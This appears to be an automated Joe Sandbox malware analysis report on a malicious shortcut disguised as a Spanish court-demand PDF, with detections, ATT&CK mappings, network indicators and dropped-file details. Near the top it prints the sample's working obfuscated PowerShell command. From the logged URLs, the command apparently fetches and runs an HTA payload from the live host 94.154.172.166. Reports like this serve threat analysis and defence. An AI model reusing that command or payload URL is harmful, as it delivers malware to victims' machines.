Source: unknownProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "c:\windows\system32\windowspowershell\v1.0\powershell.exe" -executionpolicy unrestricted $e='t:17s2zmhsalcpo65y9tar4/.'; &(-join($e[(472-468),(979-969),(299-288)])) ^= (-join($e[(472-468),(979-969),(299-288)])); ^= *% (-join($e[(757-750),(472-468),(769-761),(-904+904),(979-969)])); foreach($s in @((727-719),(-217+236),(-171+190),(387-374),(-940+941),(-632+655),(-622+645),(-144+162),(771-749),(-482+506),(-457+459),(691-675),(-573+595),(518-494),(-755+757),(-277+280),(262-257),(-797+821),(-706+708),(-556+571),(-847+862),(-704+727),(628-615),(308-296),(-217+223),(-338+357),(584-561),(763-742),(297-283),(-211+228),(677-660),(470-453),(-88+108),(-503+512),(-258+282),(194-186),(856-837),(-659+679))){$i+=$e[$s]}; *% $i;
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
Source: C:\Windows\System32\mshta.exeQueries volume information: C:\Windows\Fonts\times.ttf VolumeInformationJump to behavior
Source: C:\Windows\System32\mshta.exeQueries volume information: C:\Windows\Fonts\seguisym.ttf VolumeInformationJump to behavior
Source: C:\Windows\System32\mshta.exeQueries volume information: C:\Windows\Fonts\seguisym.ttf VolumeInformationJump to behavior
Source: C:\Windows\System32\mshta.exeQueries volume information: C:\Windows\Fonts\seguisym.ttf VolumeInformationJump to behavior
Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.chk VolumeInformationJump to behavior
Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.log VolumeInformationJump to behavior
Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.chk VolumeInformationJump to behavior
Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.log VolumeInformationJump to behavior
Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.log VolumeInformationJump to behavior
Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.log VolumeInformationJump to behavior
Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.chk VolumeInformationJump to behavior
Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\qmgr.db VolumeInformationJump to behavior
Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\qmgr.jfm VolumeInformationJump to behavior
Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\qmgr.db VolumeInformationJump to behavior
Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\qmgr.db VolumeInformationJump to behavior
Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ VolumeInformationJump to behavior
Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ VolumeInformationJump to behavior

Mitre Att&ck Matrix

ReconnaissanceResource DevelopmentInitial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionCommand and ControlExfiltrationImpact
Gather Victim Identity InformationAcquire InfrastructureValid Accounts11
Command and Scripting Interpreter		1
DLL Side-Loading		11
Process Injection		11
Masquerading		OS Credential Dumping11
Security Software Discovery		Remote Services1
Email Collection		1
Ingress Tool Transfer		Exfiltration Over Other Network MediumAbuse Accessibility Features
CredentialsDomainsDefault AccountsScheduled Task/JobBoot or Logon Initialization Scripts1
DLL Side-Loading		31
Virtualization/Sandbox Evasion		LSASS Memory11
Process Discovery		Remote Desktop ProtocolData from Removable Media1
Non-Application Layer Protocol		Exfiltration Over BluetoothNetwork Denial of Service
Email AddressesDNS ServerDomain AccountsAtLogon Script (Windows)Logon Script (Windows)11
Process Injection		Security Account Manager31
Virtualization/Sandbox Evasion		SMB/Windows Admin SharesData from Network Shared Drive11
Application Layer Protocol		Automated ExfiltrationData Encrypted for Impact
Employee NamesVirtual Private ServerLocal AccountsCronLogin HookLogin Hook1
Deobfuscate/Decode Files or Information		NTDS1
Application Window Discovery		Distributed Component Object ModelInput CaptureProtocol ImpersonationTraffic DuplicationData Destruction
Gather Victim Network InformationServerCloud AccountsLaunchdNetwork Logon ScriptNetwork Logon Script1
Obfuscated Files or Information		LSA Secrets1
File and Directory Discovery		SSHKeyloggingFallback ChannelsScheduled TransferData Encrypted for Impact
Domain PropertiesBotnetReplication Through Removable MediaScheduled TaskRC ScriptsRC Scripts1
DLL Side-Loading		Cached Domain Credentials22
System Information Discovery		VNCGUI Input CaptureMultiband CommunicationData Transfer Size LimitsService Stop

Behavior Graph

Hide Legend

Legend:

  • Process
  • Signature
  • Created File
  • DNS/IP Info
  • Is Dropped
  • Is Windows Process
  • Number of created Registry Values
  • Number of created Files
  • Visual Basic
  • Delphi
  • Java
  • .Net C# or VB.NET
  • C, C++ or other language
  • Is malicious
  • Internet

Screenshots

Thumbnails

This section contains all screenshots as thumbnails, including those not shown in the slideshow.


windows-stand

Antivirus, Machine Learning and Genetic Malware Detection

Initial Sample

SourceDetectionScannerLabelLink
DEMANDA JUICIO JUZGADO01.pdf.lnk46%ReversingLabsShortcut.Trojan.Generic
DEMANDA JUICIO JUZGADO01.pdf.lnk100%Joe Sandbox ML

Dropped Files

No Antivirus matches

Unpacked PE Files

No Antivirus matches

Domains

No Antivirus matches

URLs

SourceDetectionScannerLabelLink
https://contoso.com/License0%URL Reputationsafe
https://g.live.com/odclientsettings/ProdV2.C:0%URL Reputationsafe
https://contoso.com/0%URL Reputationsafe
https://nuget.org/nuget.exe0%URL Reputationsafe
https://oneget.orgX0%URL Reputationsafe
http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name0%URL Reputationsafe
http://nuget.org/NuGet.exe0%URL Reputationsafe
http://pesterbdd.com/images/Pester.png0%URL Reputationsafe
https://go.micro0%URL Reputationsafe
https://contoso.com/Icon0%URL Reputationsafe
https://aka.ms/pscore680%URL Reputationsafe
https://oneget.org0%URL Reputationsafe

Domains and IPs

Contacted Domains

NameIPActiveMaliciousAntivirus DetectionReputation
bg.microsoft.map.fastly.net
199.232.214.172
truefalse
    		unknown

    Contacted URLs

    NameMaliciousAntivirus DetectionReputation
    http://94.154.172.166/pczt/royyyas.htatrue
      		unknown

      URLs from Memory and Binaries

      NameSourceMaliciousAntivirus DetectionReputation
      http://94.154powershell.exe, 00000000.00000002.2221482929.00000256DDAEB000.00000004.00000800.00020000.00000000.sdmptrue
        		unknown
        http://94.154.172.166/pczt/royyyas.htaC:mshta.exe, 00000003.00000002.3401055468.000001CEAC2B0000.00000004.00000020.00020000.00000000.sdmpfalse
          		unknown
          http://94.154.172.166/ppowershell.exe, 00000000.00000002.2221482929.00000256DDAEB000.00000004.00000800.00020000.00000000.sdmptrue
            		unknown
            http://94.154.172.166/pczpowershell.exe, 00000000.00000002.2221482929.00000256DDAEB000.00000004.00000800.00020000.00000000.sdmptrue
              		unknown
              http://94.154.172.166/pczt/roypowershell.exe, 00000000.00000002.2221482929.00000256DDAEB000.00000004.00000800.00020000.00000000.sdmptrue
                		unknown
                http://94.154.172.166/pczt/royyyas.powershell.exe, 00000000.00000002.2221482929.00000256DDAEB000.00000004.00000800.00020000.00000000.sdmptrue
                  		unknown
                  https://contoso.com/Licensepowershell.exe, 00000000.00000002.2242575824.00000256ECC44000.00000004.00000800.00020000.00000000.sdmpfalse
                  • URL Reputation: safe
                  		unknown
                  http://94.154.powershell.exe, 00000000.00000002.2221482929.00000256DDAEB000.00000004.00000800.00020000.00000000.sdmptrue
                    		unknown
                    http://94.154.172.166/pczt/ropowershell.exe, 00000000.00000002.2221482929.00000256DDAEB000.00000004.00000800.00020000.00000000.sdmptrue
                      		unknown
                      https://g.live.com/odclientsettings/ProdV2.C:svchost.exe, 00000006.00000003.2445301976.0000017611C80000.00000004.00000800.00020000.00000000.sdmp, qmgr.db.6.dr, edb.log.6.drfalse
                      • URL Reputation: safe
                      		unknown
                      http://94.154.172.166/pczt/royyyas.hta_BROWSER_AP5;mshta.exe, 00000003.00000002.3400850119.000001CEAC240000.00000004.00000020.00020000.00000000.sdmpfalse
                        		unknown
                        http://94.154.17powershell.exe, 00000000.00000002.2221482929.00000256DDAEB000.00000004.00000800.00020000.00000000.sdmptrue
                          		unknown
                          http://94.154.1powershell.exe, 00000000.00000002.2221482929.00000256DDAEB000.00000004.00000800.00020000.00000000.sdmptrue
                            		unknown
                            http://94.154.172.166/pczt/royyyas.htatamshta.exe, 00000003.00000002.3401055468.000001CEAC2D7000.00000004.00000020.00020000.00000000.sdmpfalse
                              		unknown
                              http://94.154.172.powershell.exe, 00000000.00000002.2221482929.00000256DDAEB000.00000004.00000800.00020000.00000000.sdmptrue
                                		unknown
                                http://94.154.172.1powershell.exe, 00000000.00000002.2221482929.00000256DDAEB000.00000004.00000800.00020000.00000000.sdmptrue
                                  		unknown
                                  http://94.154.172.166/pczt/royyyas.htaHmshta.exe, 00000003.00000002.3400946587.000001CEAC260000.00000004.00000800.00020000.00000000.sdmpfalse
                                    		unknown
                                    http://94.154.172.166/pczt/rpowershell.exe, 00000000.00000002.2221482929.00000256DDAEB000.00000004.00000800.00020000.00000000.sdmptrue
                                      		unknown
                                      http://94.154.172powershell.exe, 00000000.00000002.2221482929.00000256DDAEB000.00000004.00000800.00020000.00000000.sdmptrue
                                        		unknown
                                        http://94.154.172.166/pczt/powershell.exe, 00000000.00000002.2221482929.00000256DDAEB000.00000004.00000800.00020000.00000000.sdmptrue
                                          		unknown
                                          http://94.154.172.166/pczt/royyypowershell.exe, 00000000.00000002.2221482929.00000256DDAEB000.00000004.00000800.00020000.00000000.sdmptrue
                                            		unknown
                                            https://contoso.com/powershell.exe, 00000000.00000002.2242575824.00000256ECC44000.00000004.00000800.00020000.00000000.sdmpfalse
                                            • URL Reputation: safe
                                            		unknown
                                            https://go.micros-powershell.exe, 00000000.00000002.2247853489.00000256F4E15000.00000004.00000020.00020000.00000000.sdmpfalse
                                              		unknown
                                              https://nuget.org/nuget.exepowershell.exe, 00000000.00000002.2242575824.00000256ECD87000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000000.00000002.2221482929.00000256DE57C000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000000.00000002.2242575824.00000256ECC44000.00000004.00000800.00020000.00000000.sdmpfalse
                                              • URL Reputation: safe
                                              		unknown
                                              https://oneget.orgXpowershell.exe, 00000000.00000002.2221482929.00000256DE2DF000.00000004.00000800.00020000.00000000.sdmpfalse
                                              • URL Reputation: safe
                                              		unknown
                                              http://94.154.172.166/pczt/royyyas.hta5mshta.exe, 00000003.00000002.3401055468.000001CEAC2D7000.00000004.00000020.00020000.00000000.sdmpfalse
                                                		unknown
                                                http://94.154.172.166/pczt/royyyas.hta3mshta.exe, 00000003.00000002.3401055468.000001CEAC2B0000.00000004.00000020.00020000.00000000.sdmpfalse
                                                  		unknown
                                                  http://94.154.172.166/powershell.exe, 00000000.00000002.2221482929.00000256DDAEB000.00000004.00000800.00020000.00000000.sdmptrue
                                                    		unknown
                                                    http://94.15powershell.exe, 00000000.00000002.2221482929.00000256DDAEB000.00000004.00000800.00020000.00000000.sdmptrue
                                                      		unknown
                                                      http://94.154.172.166/pcztpowershell.exe, 00000000.00000002.2221482929.00000256DDAEB000.00000004.00000800.00020000.00000000.sdmptrue
                                                        		unknown
                                                        http://schemas.xmlsoap.org/ws/2005/05/identity/claims/namepowershell.exe, 00000000.00000002.2221482929.00000256DCBD1000.00000004.00000800.00020000.00000000.sdmpfalse
                                                        • URL Reputation: safe
                                                        		unknown
                                                        http://94.154.172.166/pcpowershell.exe, 00000000.00000002.2221482929.00000256DDAEB000.00000004.00000800.00020000.00000000.sdmptrue
                                                          		unknown
                                                          http://nuget.org/NuGet.exepowershell.exe, 00000000.00000002.2242575824.00000256ECD87000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000000.00000002.2221482929.00000256DE57C000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000000.00000002.2242575824.00000256ECC44000.00000004.00000800.00020000.00000000.sdmpfalse
                                                          • URL Reputation: safe
                                                          		unknown
                                                          http://www.apache.org/licenses/LICENSE-2.0powershell.exe, 00000000.00000002.2221482929.00000256DE2DF000.00000004.00000800.00020000.00000000.sdmpfalse
                                                            		unknown
                                                            http://pesterbdd.com/images/Pester.pngpowershell.exe, 00000000.00000002.2221482929.00000256DE521000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000000.00000002.2221482929.00000256DE2DF000.00000004.00000800.00020000.00000000.sdmpfalse
                                                            • URL Reputation: safe
                                                            		unknown
                                                            http://www.apache.org/licenses/LICENSE-2.0.htmlpowershell.exe, 00000000.00000002.2221482929.00000256DE521000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000000.00000002.2221482929.00000256DE2DF000.00000004.00000800.00020000.00000000.sdmpfalse
                                                              		unknown
                                                              https://go.micropowershell.exe, 00000000.00000002.2221482929.00000256DDAEB000.00000004.00000800.00020000.00000000.sdmpfalse
                                                              • URL Reputation: safe
                                                              		unknown
                                                              http://94.154.172.166/pczt/royyyas.htpowershell.exe, 00000000.00000002.2221482929.00000256DDAEB000.00000004.00000800.00020000.00000000.sdmptrue
                                                                		unknown
                                                                https://contoso.com/Iconpowershell.exe, 00000000.00000002.2242575824.00000256ECC44000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                • URL Reputation: safe
                                                                		unknown
                                                                http://94.154.172.166/pczt/royyyas.hta...orymshta.exe, 00000003.00000002.3401055468.000001CEAC2D7000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                  		unknown
                                                                  http://94.154.172.16powershell.exe, 00000000.00000002.2221482929.00000256DDAEB000.00000004.00000800.00020000.00000000.sdmptrue
                                                                    		unknown
                                                                    http://crl.ver)svchost.exe, 00000006.00000002.3402795586.0000017611E8D000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                      		unknown
                                                                      http://94.154.172.166/pczt/royypowershell.exe, 00000000.00000002.2221482929.00000256DDAEB000.00000004.00000800.00020000.00000000.sdmptrue
                                                                        		unknown
                                                                        https://github.com/Pester/Pesterpowershell.exe, 00000000.00000002.2221482929.00000256DE521000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000000.00000002.2221482929.00000256DE2DF000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                          		unknown
                                                                          http://94.154.172.166/pczt/royyyaspowershell.exe, 00000000.00000002.2221482929.00000256DDAEB000.00000004.00000800.00020000.00000000.sdmptrue
                                                                            		unknown
                                                                            http://94.154.172.166powershell.exe, 00000000.00000002.2221482929.00000256DDAEB000.00000004.00000800.00020000.00000000.sdmptrue
                                                                              		unknown
                                                                              http://94.154.172.166/pczt/royyyas.hpowershell.exe, 00000000.00000002.2221482929.00000256DDAEB000.00000004.00000800.00020000.00000000.sdmptrue
                                                                                		unknown
                                                                                https://g.live.com/odclientsettings/Prod/C:edb.log.6.drfalse
                                                                                  		unknown
                                                                                  http://94.154.172.166/pczt/royyyapowershell.exe, 00000000.00000002.2221482929.00000256DDAEB000.00000004.00000800.00020000.00000000.sdmptrue
                                                                                    		unknown
                                                                                    http://94.1powershell.exe, 00000000.00000002.2221482929.00000256DDAEB000.00000004.00000800.00020000.00000000.sdmptrue
                                                                                      		unknown
                                                                                      https://aka.ms/pscore68powershell.exe, 00000000.00000002.2221482929.00000256DCBD1000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                      • URL Reputation: safe
                                                                                      		unknown
                                                                                      http://94.154.172.166/pczt/royyyas.hta...mshta.exe, 00000003.00000002.3401055468.000001CEAC2D7000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                        		unknown
                                                                                        https://oneget.orgpowershell.exe, 00000000.00000002.2221482929.00000256DE2DF000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                        • URL Reputation: safe
                                                                                        		unknown

                                                                                        World Map of Contacted IPs

                                                                                        • No. of IPs < 25%
                                                                                        • 25% < No. of IPs < 50%
                                                                                        • 50% < No. of IPs < 75%
                                                                                        • 75% < No. of IPs

                                                                                        Public IPs

                                                                                        IPDomainCountryFlagASNASN NameMalicious
                                                                                        94.154.172.166
                                                                                        		unknownGermany
                                                                                        		10753LVLT-10753UStrue

                                                                                        Private

                                                                                        IP
                                                                                        127.0.0.1

                                                                                        General Information

                                                                                        Joe Sandbox version:41.0.0 Charoite
                                                                                        Analysis ID:1533039
                                                                                        Start date and time:2024-10-14 11:04:08 +02:00
                                                                                        Joe Sandbox product:CloudBasic
                                                                                        Overall analysis duration:0h 4m 33s
                                                                                        Hypervisor based Inspection enabled:false
                                                                                        Report type:full
                                                                                        Cookbook file name:default.jbs
                                                                                        Analysis system description:Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
                                                                                        Number of analysed new started processes analysed:8
                                                                                        Number of new started drivers analysed:0
                                                                                        Number of existing processes analysed:0
                                                                                        Number of existing drivers analysed:0
                                                                                        Number of injected processes analysed:0
                                                                                        Technologies:
                                                                                        • HCA enabled
                                                                                        • EGA enabled
                                                                                        • AMSI enabled
                                                                                        Analysis Mode:default
                                                                                        Analysis stop reason:Timeout
                                                                                        Sample name:DEMANDA JUICIO JUZGADO01.pdf.lnk
                                                                                        Detection:MAL
                                                                                        Classification:mal92.evad.winLNK@5/9@0/2
                                                                                        EGA Information:Failed
                                                                                        HCA Information:
                                                                                        • Successful, ratio: 100%
                                                                                        • Number of executed functions: 1
                                                                                        • Number of non-executed functions: 0
                                                                                        Cookbook Comments:
                                                                                        • Found application associated with file extension: .lnk

                                                                                        Warnings

                                                                                        • Exclude process from analysis (whitelisted): dllhost.exe, WMIADAP.exe, SIHClient.exe
                                                                                        • Excluded IPs from analysis (whitelisted): 20.190.160.17, 40.126.32.68, 40.126.32.134, 20.190.160.22, 20.190.160.20, 40.126.32.138, 40.126.32.72, 40.126.32.133, 184.28.90.27
                                                                                        • Excluded domains from analysis (whitelisted): client.wns.windows.com, prdv4a.aadg.msidentity.com, fs.microsoft.com, otelrules.azureedge.net, slscr.update.microsoft.com, ctldl.windowsupdate.com.delivery.microsoft.com, www.tm.v4.a.prd.aadg.akadns.net, ctldl.windowsupdate.com, fs-wildcard.microsoft.com.edgekey.net, fs-wildcard.microsoft.com.edgekey.net.globalredir.akadns.net, login.msa.msidentity.com, fe3cr.delivery.mp.microsoft.com, ocsp.digicert.com, login.live.com, e16604.g.akamaiedge.net, prod.fs.microsoft.com.akadns.net, wu-b-net.trafficmanager.net, www.tm.lg.prod.aadmsa.trafficmanager.net
                                                                                        • Execution Graph export aborted for target powershell.exe, PID 7292 because it is empty
                                                                                        • Not all processes where analyzed, report is missing behavior information
                                                                                        • Report size getting too big, too many NtOpenKeyEx calls found.
                                                                                        • Report size getting too big, too many NtProtectVirtualMemory calls found.
                                                                                        • Report size getting too big, too many NtQueryValueKey calls found.
                                                                                        • VT rate limit hit for: DEMANDA JUICIO JUZGADO01.pdf.lnk

                                                                                        Simulations

                                                                                        Behavior and APIs

                                                                                        TimeTypeDescription
                                                                                        05:05:13API Interceptor26x Sleep call for process: powershell.exe modified
                                                                                        05:05:39API Interceptor2x Sleep call for process: svchost.exe modified

                                                                                        Joe Sandbox View / Context

                                                                                        IPs

                                                                                        MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                                        94.154.172.166iUheZTQknn.lnkGet hashmaliciousUnknownBrowse
                                                                                        • 94.154.172.166/rwrv/fa.exe
                                                                                        package1107.png.lnkGet hashmaliciousXWormBrowse
                                                                                        • 94.154.172.166/wvqv/MH.exe
                                                                                        Stien.exeGet hashmaliciousPureLog Stealer, zgRATBrowse
                                                                                        • voucher-01-static.com/rkei/223-8.txt

                                                                                        Domains

                                                                                        MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                                        bg.microsoft.map.fastly.nethttp://search.braraildye.liveGet hashmaliciousUnknownBrowse
                                                                                        • 199.232.210.172
                                                                                        https://doc.triadexport.in/sen43906919549ed0e54ebff83709ab950143906919549ed0e54ebff83709ab950143906919549ed0e54ebff83709ab950143906919549ed0e54ebff83709ab9/?top=selin.basaran@digiturk.com.trGet hashmaliciousUnknownBrowse
                                                                                        • 199.232.214.172
                                                                                        https://narrow-light-alley.glitch.me/public/40.htmGet hashmaliciousHTMLPhisherBrowse
                                                                                        • 199.232.210.172
                                                                                        https://doc.triadexport.in/sen43906919549ed0e54ebff83709ab950143906919549ed0e54ebff83709ab950143906919549ed0e54ebff83709ab950143906919549ed0e54ebff83709ab9/?top=pucom@hdel.co.krGet hashmaliciousHTMLPhisherBrowse
                                                                                        • 199.232.210.172
                                                                                        https://r.clk20.com/s.ashx?ms=clk20comb:221053_100505&e=ACCOUNTING%40SBO.CO.AT&eId=72534635&c=h&url=https%3a%2f%2fwww.digikey.at%3futm_medium%3demail%26utm_source%3dcsn%26utm_campaign%3dclk20comb:221053-100505_CSN24CMM1%26utm_content%3dDigiKeyLogo_AT%26utm_cid%3d&c=E,1,HpCcAtsbpCegpKKqJ9Y5uFcA_ydFOa8bwbyPDmQPWZrYVAHSEO4EBUFk2oBVcoOSlhj1U-BBO3hqrTRAz1S8XP6noRCD2_d6D_dY_HcwfLi_OKAuOxCdCkg,&typo=1Get hashmaliciousUnknownBrowse
                                                                                        • 199.232.210.172
                                                                                        https://tracking.ei9ie7ph.com/aff_c?offer_id=14263&aff_id=2&source=testoffer&aff_sub=testofferGet hashmaliciousUnknownBrowse
                                                                                        • 199.232.214.172
                                                                                        https://itbm.egnyte.com/dl/D0z39LyNGqGet hashmaliciousUnknownBrowse
                                                                                        • 199.232.210.172
                                                                                        #U0415Sh#U0430rk.exeGet hashmaliciousRedLineBrowse
                                                                                        • 199.232.210.172
                                                                                        file.exeGet hashmaliciousLummaCBrowse
                                                                                        • 199.232.210.172
                                                                                        https://fexegreuyauja-8124.vercel.app/mixc.htmlGet hashmaliciousHTMLPhisherBrowse
                                                                                        • 199.232.214.172

                                                                                        ASNs

                                                                                        MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                                        LVLT-10753US6DroQ0jTFY.elfGet hashmaliciousMiraiBrowse
                                                                                        • 168.215.26.58
                                                                                        https://meinfokont.blogspot.com/danimbWRVaGhNb3NYNW1EUnN4RnFyVnNGN1dRZkJsdXlNU0VocXhlZ08zOCticlBmWUZaNURLa3ZsQ3ZRMmg2eGE5UlBjUmozbnlGYUNhUWRWdEdjZVJQOGl5dktSUDA4M2hzV3V2TU1LNWpaaWs9Get hashmaliciousPhisherBrowse
                                                                                        • 193.25.219.196
                                                                                        na.elfGet hashmaliciousMiraiBrowse
                                                                                        • 147.3.147.104
                                                                                        13P2mxLaQk.exeGet hashmaliciousRedLineBrowse
                                                                                        • 45.88.88.45
                                                                                        SOA-injazfe-10424.vbsGet hashmaliciousXWormBrowse
                                                                                        • 45.88.91.147
                                                                                        kUiqbpzmbo.exeGet hashmaliciousXWormBrowse
                                                                                        • 178.215.236.225
                                                                                        yakov.x86.elfGet hashmaliciousMiraiBrowse
                                                                                        • 168.215.26.13
                                                                                        Scan_doc_09_16_24_1120.exeGet hashmaliciousScreenConnect ToolBrowse
                                                                                        • 178.215.236.119
                                                                                        Scan_doc_09_16_24_1203.exeGet hashmaliciousScreenConnect ToolBrowse
                                                                                        • 178.215.236.119
                                                                                        Scan_doc_09_16_24_1120.exeGet hashmaliciousScreenConnect ToolBrowse
                                                                                        • 178.215.236.119

                                                                                        JA3 Fingerprints

                                                                                        No context

                                                                                        Dropped Files

                                                                                        No context

                                                                                        Created / dropped Files

                                                                                        C:\ProgramData\Microsoft\Network\Downloader\edb.log

                                                                                        Download File
                                                                                        Process:C:\Windows\System32\svchost.exe
                                                                                        File Type:data
                                                                                        Category:dropped
                                                                                        Size (bytes):1310720
                                                                                        Entropy (8bit):0.8307365107517496
                                                                                        Encrypted:false
                                                                                        SSDEEP:1536:gJhkM9gB0CnCm0CQ0CESJPB9JbJQfvcso0l1T4MfzzTi1FjIIXYvjbglQdmHDugZ:gJjJGtpTq2yv1AuNZRY3diu8iBVqFz
                                                                                        MD5:BF6155F4B3C6CE02843816F50230AB6C
                                                                                        SHA1:15B83DCA8BEE7031C3005D56BD1C4B5F9DF04BC0
                                                                                        SHA-256:68733C4C539F6A68FFAC688EB23D3E5D5729474244BE49BE1961873844B62032
                                                                                        SHA-512:F180309AD35DADCAAE1194EA5A94994A764F3CB8F846E788BE5C8D6E93F69B76F85EFDFED10119C9FAD30C239D921409920F2799B69903E8D03B567CA14CED31
                                                                                        Malicious:false
                                                                                        Reputation:low
                                                                                        Preview:...M........@..@.-...{5..;...{..........<...D./..;...{..................C:\ProgramData\Microsoft\Network\Downloader\.........................................................................................................................................................................................................................C:\ProgramData\Microsoft\Network\Downloader\..........................................................................................................................................................................................................................0u..................@...@......................4..........E.[.rXrX.#.........`h.................h.5.......3.....X\...;...{..................C.:.\.P.r.o.g.r.a.m.D.a.t.a.\.M.i.c.r.o.s.o.f.t.\.N.e.t.w.o.r.k.\.D.o.w.n.l.o.a.d.e.r.\.q.m.g.r...d.b....................................................................................................................................................................

                                                                                        C:\ProgramData\Microsoft\Network\Downloader\qmgr.db

                                                                                        Download File
                                                                                        Process:C:\Windows\System32\svchost.exe
                                                                                        File Type:Extensible storage engine DataBase, version 0x620, checksum 0xbbb18c1f, page size 16384, DirtyShutdown, Windows version 10.0
                                                                                        Category:dropped
                                                                                        Size (bytes):1310720
                                                                                        Entropy (8bit):0.6585839923215889
                                                                                        Encrypted:false
                                                                                        SSDEEP:1536:pSB2ESB2SSjlK/rv5rO1T1B0CZSJRYkr3g16P92UPkLk+kAwI/0uzn10M1Dn/di6:paza9v5hYe92UOHDnAPZ4PZf9h/9h
                                                                                        MD5:030E36611EB62CA6C97C6A08559C4947
                                                                                        SHA1:14E5064CADD5060CCAADD466275B703CEFF1EB1C
                                                                                        SHA-256:852C2E5C1CB1696604CEF58CBCCFF5D6BAE42C0095898E3952808EBFF7549C3F
                                                                                        SHA-512:908167270ABDF18293F8645948A26A68AFADEB52467C1DFB7C18A80F562B4B12147C3E57DC91C6ECDF297A74EA16E899422A0389738E21C788AF472C91619AD4
                                                                                        Malicious:false
                                                                                        Reputation:low
                                                                                        Preview:....... ...............X\...;...{......................0.z..........{..'....|..h.|.........................D./..;...{..........................................................................................................eJ......n....@...................................................................................................... ........-...{5..............................................................................................................................................................................................2...{..................................t{Sf'....|.................. .&.'....|...........................#......h.|.....................................................................................................................................................................................................................................................................................................................................................

                                                                                        C:\ProgramData\Microsoft\Network\Downloader\qmgr.jfm

                                                                                        Download File
                                                                                        Process:C:\Windows\System32\svchost.exe
                                                                                        File Type:data
                                                                                        Category:dropped
                                                                                        Size (bytes):16384
                                                                                        Entropy (8bit):0.08055209035020645
                                                                                        Encrypted:false
